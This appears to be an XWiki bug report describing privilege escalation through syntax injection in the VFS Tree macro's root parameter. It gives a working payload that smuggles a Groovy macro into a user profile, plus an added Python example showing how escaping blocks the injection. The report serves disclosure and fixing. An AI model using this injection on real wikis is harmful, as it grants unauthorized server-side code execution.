XWiki Platform: XWIKI-20260

Privilege escalation (PR) from account/view through VFS Tree macro



    Description

      Steps to reproduce:

      Add

      {{vfsTree root="~" /~}~} {{cache id=~"vfs-macro-content~"~}~}{{groovy~}~}println(~"Hello from Groovy!~"){{/groovy~}~}{{/cache~}~}"/}}

      to any place where you can use wiki syntax like the "about" section in your user profile as a user without programming or script rights.

      Expected result:

      An empty VFS Tree or some error is displayed.

      Actual result:

      The output

          The [tree] macro is a standalone macro and it cannot be used inline. Click on this message for details.
          Hello from Groovy!" reference="path:/xwiki/bin/get/XWiki/username?sheet=Macros.VFSTreeJSON&outputSyntax=plain" links="true"/}}

      is displayed. This shows that the Groovy macro has been executed and thus programming rights have been gained. This is because the VFS Tree macro allows XWiki syntax injection through the root parameter.

      Note that the VFS Tree macro, while being part of xwiki-platform, is not bundled with XWiki and thus this issue cannot be exploited on a default installation of XWiki.
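The following is an added example, not XWiki's code and not the fix applied to the VFS Tree macro: it models the defect (a parameter value interpolated unescaped into a `{{tree ...}}` call, which is an assumed template shaped after the output above) and shows that escaping the value with XWiki's `~` escape character keeps the attacker-controlled text inside the quoted parameter, so the wiki parser sees one macro instead of two.

```python
# Added example (not XWiki's code). The TREE_TEMPLATE string is an assumption
# modelled on the output quoted in the issue, not the macro's real source.

ESCAPE = "~"  # XWiki 2.1 escape character: "~x" is read as a literal "x"

def escape_macro_parameter(value: str) -> str:
    """Escape a string for use inside a double-quoted macro parameter value.
    '"' and '~' must be escaped; '}' is escaped defensively so the value can
    never contain a raw '}}' (the issue's payload escapes it the same way)."""
    return "".join(ESCAPE + ch if ch in ('~', '"', '}') else ch for ch in value)

def unescape_macro_parameter(value: str) -> str:
    """Inverse of escape_macro_parameter: the value the parser hands the macro."""
    out, i = [], 0
    while i < len(value):
        if value[i] == ESCAPE and i + 1 < len(value):
            out.append(value[i + 1]); i += 2
        else:
            out.append(value[i]); i += 1
    return "".join(out)

TREE_TEMPLATE = ('{{tree root="%s" reference="path:/xwiki/bin/get/XWiki/username'
                 '?sheet=Macros.VFSTreeJSON&outputSyntax=plain" links="true"/}}')

def build_tree_macro(root: str, escape: bool) -> str:
    """Render the wiki-syntax call; escape=False is the vulnerable pattern."""
    return TREE_TEMPLATE % (escape_macro_parameter(root) if escape else root)

def count_macro_starts(markup: str) -> int:
    """Count macro openings ({{name ...}}) a syntax parser would see, skipping
    ~-escaped characters and anything inside a quoted parameter value."""
    count, i, in_quote = 0, 0, False
    while i < len(markup):
        ch = markup[i]
        if ch == ESCAPE:                      # escaped char is never a delimiter
            i += 2
            continue
        if ch == '"':
            in_quote = not in_quote
        elif (not in_quote and markup.startswith("{{", i)
              and not markup.startswith("{{/", i)):
            count += 1
        i += 1
    return count

# Constructed root value in the shape of the issue's payload: it closes the
# parameter and the macro, then opens a second macro of its own.
INJECTED_ROOT = '" /}} {{groovy}}println("hi"){{/groovy}}'

if __name__ == "__main__":
    print(count_macro_starts(build_tree_macro(INJECTED_ROOT, escape=False)))  # 2
    print(count_macro_starts(build_tree_macro(INJECTED_ROOT, escape=True)))   # 1
```

The same check can be run against the exact `root` value from the steps above; with escaping applied the result stays at one macro.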

            People

              mleduc Manuel Leduc
              MichaelHamann Michael Hamann